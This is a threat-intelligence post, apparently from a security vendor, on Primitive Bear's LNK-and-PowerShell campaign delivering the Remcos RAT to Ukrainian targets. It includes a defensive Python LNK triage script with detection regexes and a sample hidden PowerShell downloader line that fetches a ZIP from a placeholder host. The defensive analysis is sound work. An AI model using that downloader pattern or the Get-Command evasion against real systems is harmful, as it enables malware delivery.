Related Families: Remcos
Executive Summary
Primitive Bear has been observed targeting Ukrainian users with malicious LNK files since at least November 2024. This operation employs a PowerShell downloader and DLL side-loading techniques to deliver the Remcos RAT, exploiting war-related themed lures to deceive victims.
Key Takeaways
- Primitive Bear uses ZIP-compressed LNK files disguised as Office documents, leveraging Ukraine invasion themes, to target users.
- The campaign employs PowerShell scripts and DLL side-loading to deploy Remcos, a versatile remote access tool.
- Payload servers restrict access to only Ukrainian victims, indicating precise geofencing.
The Campaign
A sophisticated campaign orchestrated by the Primitive Bear threat actor group was observed targeting Ukrainian entities. This campaign distributes the Remcos backdoor, a full-featured remote access tool, through a multi-stage infection chain that begins with malicious LNK files. These files, typically delivered inside ZIP archives, are crafted to resemble legitimate Office documents, with filenames that tie into the ongoing Russia-Ukraine conflict. This thematic lure is a hallmark of Primitive Bear’s phishing strategy, designed to exploit current events and maximize victim engagement. Cisco Talos reported on this activity.
The infection chain begins when a user extracts the LNK file from the ZIP archive, typically to the %TEMP% folder, and executes it. The LNK files contain embedded PowerShell code that serves as the first-stage downloader. Notably, the PowerShell scripts use the `Get-Command` cmdlet to invoke other cmdlets indirectly rather than by name, a technique likely intended to evade string-based antivirus detection. This code connects to remote servers to retrieve a second-stage ZIP payload. These servers enforce strict geofencing: requests from non-Ukrainian IP addresses were denied with HTTP 403 errors during external testing, while public sandbox samples confirm the payload was served to targets in the region.
The second-stage ZIP contains a mix of clean and malicious files, including a legitimate executable and a malicious DLL. Through DLL side-loading, the legitimate executable loads the malicious DLL, which decrypts and executes the final Remcos payload from encrypted files bundled in the archive. Once active, Remcos grants attackers extensive control over infected systems, including keystroke logging, screen capture, and file management. A decoy document is also displayed post-infection to mask the compromise, making it harder for end users to notice anything is wrong.
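The LNK stage described above is a natural place for a defender to triage attachments before they reach a user. The following is an added example, not code from the original post or from Talos or PolySwarm: it walks the Shell Link (MS-SHLLINK) structure up to the command-line argument string and flags the traits the post describes, namely `Get-Command` indirection, a download primitive, and a hidden window. The indicator patterns, the `build_sample_lnk` helper, and the `SAMPLE_ARGS` string (with a placeholder host) are assumptions constructed for this example.

```python
import re
import struct

LNK_HEADER_SIZE = 0x4C
# LinkFlags bits from MS-SHLLINK that decide which optional structures follow the header
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 1 << 0, 1 << 1, 1 << 7
HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON = 1 << 2, 1 << 3, 1 << 4, 1 << 5, 1 << 6

# Heuristics (assumed, not from the post) for a hidden PowerShell one-liner that reaches
# cmdlets through Get-Command/gcm instead of naming them, then fetches a second stage.
INDICATORS = {
    "get-command indirection": re.compile(r"[&.]\s*\(\s*(?:gcm|Get-Command)\b", re.I),
    "download": re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I),
    "hidden window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
}

def extract_lnk_arguments(data: bytes) -> str:
    """Walk a Shell Link file up to its COMMAND_LINE_ARGUMENTS string and return it."""
    if len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE:
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = LNK_HEADER_SIZE
    if flags & HAS_ID_LIST:                 # IDListSize (u16) followed by the IDList itself
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:               # LinkInfoSize (u32) counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    unicode = bool(flags & IS_UNICODE)
    width = 2 if unicode else 1
    args = ""
    # StringData fields come in this fixed order, each present only if its flag is set
    for flag in (HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS, HAS_ICON):
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters, not bytes
        pos += 2
        raw = data[pos:pos + count * width]
        pos += count * width
        if flag == HAS_ARGS:
            args = raw.decode("utf-16-le" if unicode else "cp1252", errors="replace")
    return args

def triage_lnk(data: bytes) -> list:
    """Return the names of the indicators matched by the LNK's argument string."""
    return [name for name, rx in INDICATORS.items() if rx.search(extract_lnk_arguments(data))]

def build_sample_lnk(arguments: str) -> bytes:
    """Constructed test input: a minimal LNK carrying only a Unicode argument string."""
    header = bytearray(LNK_HEADER_SIZE)
    struct.pack_into("<I", header, 0, LNK_HEADER_SIZE)
    struct.pack_into("<I", header, 0x14, HAS_ARGS | IS_UNICODE)
    return bytes(header) + struct.pack("<H", len(arguments)) + arguments.encode("utf-16-le")

# Constructed argument string in the shape the post describes; the host is a placeholder.
SAMPLE_ARGS = '-NoP -W Hidden -c "& (Get-Command Invoke-WebRequest) http://payload.invalid/s.zip -OutFile $env:TEMP\\s.zip"'
```

Run `triage_lnk` over files extracted from incoming ZIP attachments; any hit on the indirection pattern is worth a closer look even when the other indicators are absent.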
What is Remcos?
Remcos RAT is a sophisticated trojan initially marketed as a legitimate tool for remote Windows system management. Cybercriminals have exploited its capabilities for malicious purposes since 2016. Delivered primarily through phishing emails with malicious attachments, Remcos grants attackers full control over infected devices. Its capabilities include logging keystrokes, capturing screenshots, recording audio and video via webcams and microphones, and stealing sensitive data. The malware employs obfuscation, anti-debugging techniques, and encryption to evade detection, often using process injection or hollowing for persistence.
Who is Primitive Bear?
Primitive Bear, also known as Gamaredon, Armageddon, Iron Tilden, Shuckworm, Blue Alpha, and ACTINIUM, is a Russia-aligned threat actor group operating out of Simferopol, Crimea. The group has been active since at least 2013 and is widely believed to be linked to the Russian Federal Security Service (FSB), with Ukraine’s government attributing it to FSB Center 18. Primitive Bear is known for its persistent cyber espionage campaigns, primarily targeting Ukrainian entities.
The group employs a variety of TTPs. It frequently uses spearphishing emails with malicious attachments, such as .docx files, to deliver custom-developed malware like Pterodo variants. Primitive Bear recycles domains across its infrastructure and maintains persistence through scheduled tasks and Visual Basic Script (VBS) files. It has also been observed deploying remote access tools such as UltraVNC for sustained network access and leveraging stolen documents to craft timely, convincing lures aligned with real-world events.
Primitive Bear predominantly targets Ukraine, focusing on government agencies, military organizations, law enforcement, the judiciary, NGOs, and non-profits. Its operations reflect a strong emphasis on intelligence collection, often exploiting regional tensions to gather sensitive data. The group’s activity intensified amid the Russia-Ukraine conflict, with campaigns tied to geopolitical developments since 2014, including the annexation of Crimea. While its technical sophistication may appear modest, relying on open-source tools and scripts, Primitive Bear achieves effectiveness through persistence and tailored social engineering, making it a significant threat to Ukrainian interests.
IOCs
PolySwarm has multiple samples associated with this campaign. You can use the following CLI command to search for all Primitive Bear samples in our portal:
$ polyswarm link list -t PrimitiveBear
Contact us at hivemind@polyswarm.io | Check out our blog | Subscribe to our reports.